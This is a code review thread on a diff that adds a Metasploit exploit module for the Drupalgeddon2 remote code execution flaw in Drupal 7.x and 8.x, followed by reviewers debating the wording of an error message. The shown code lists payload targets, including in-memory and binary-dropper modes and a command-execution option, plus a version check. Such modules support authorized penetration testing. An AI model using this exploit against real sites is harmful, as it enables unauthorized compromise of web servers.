modules/exploits/unix/webapp/drupal_drupalgeddon2.rb

```diff
@@ -0,0 +1,395 @@
+      'Targets'        => [
+        #
+        # Automatic targets (PHP, cmd/unix, native)
+        #
+        ['Automatic (PHP In-Memory)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP
+        ],
+        ['Automatic (PHP Dropper)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP
+        ],
+        ['Automatic (Unix In-Memory)',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD
+        ],
+        ['Automatic (Linux Dropper)',
+         'Platform'    => 'linux',
+         'Arch'        => [ARCH_X86, ARCH_X64]
+        ],
+        #
+        # Drupal 7.x targets (PHP, cmd/unix, native)
+        #
+        ['Drupal 7.x (PHP In-Memory)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP,
+         'Version'     => Gem::Version.new('7.x')
+        ],
+        ['Drupal 7.x (PHP Dropper)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP,
+         'Version'     => Gem::Version.new('7.x')
+        ],
+        ['Drupal 7.x (Unix In-Memory)',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Version'     => Gem::Version.new('7.x')
+        ],
+        ['Drupal 7.x (Linux Dropper)',
+         'Platform'    => 'linux',
+         'Arch'        => [ARCH_X86, ARCH_X64],
+         'Version'     => Gem::Version.new('7.x')
+        ],
+        #
+        # Drupal 8.x targets (PHP, cmd/unix, native)
+        #
+        ['Drupal 8.x (PHP In-Memory)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP,
+         'Version'     => Gem::Version.new('8.x')
+        ],
+        ['Drupal 8.x (PHP Dropper)',
+         'Platform'    => 'php',
+         'Arch'        => ARCH_PHP,
+         'Version'     => Gem::Version.new('8.x')
+        ],
+        ['Drupal 8.x (Unix In-Memory)',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Version'     => Gem::Version.new('8.x')
+        ],
+        ['Drupal 8.x (Linux Dropper)',
+         'Platform'    => 'linux',
+         'Arch'        => [ARCH_X86, ARCH_X64],
+         'Version'     => Gem::Version.new('8.x')
+        ]
+      ],
+      'DefaultTarget'  => 0 # Automatic (PHP In-Memory)
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),
+      OptString.new('PHP_FUNC',  [true, 'PHP function to execute', 'passthru']),
+      OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [false, 'Writable dir for dropped binaries'])
+    ])
+  end
+
+  def check
+    checkcode = CheckCode::Safe
+
+    if drupal_version
+      print_status("Drupal #{@version} targeted at #{full_uri}")
+      checkcode = CheckCode::Detected
+    else
+      print_error('Could not configure Drupal version')
```

Comment:
s/configure/determine/

Reply:
That's a better word! I was looking for something less specific than "detect." Brain fart, I suppose, lol.

Reply:
> Could not configure Drupal version
> Could not configure Drupal version **to target**
> Could not **determine** Drupal version
> Could not determine Drupal version to target

I think the last one encapsulates the idea I'm going for.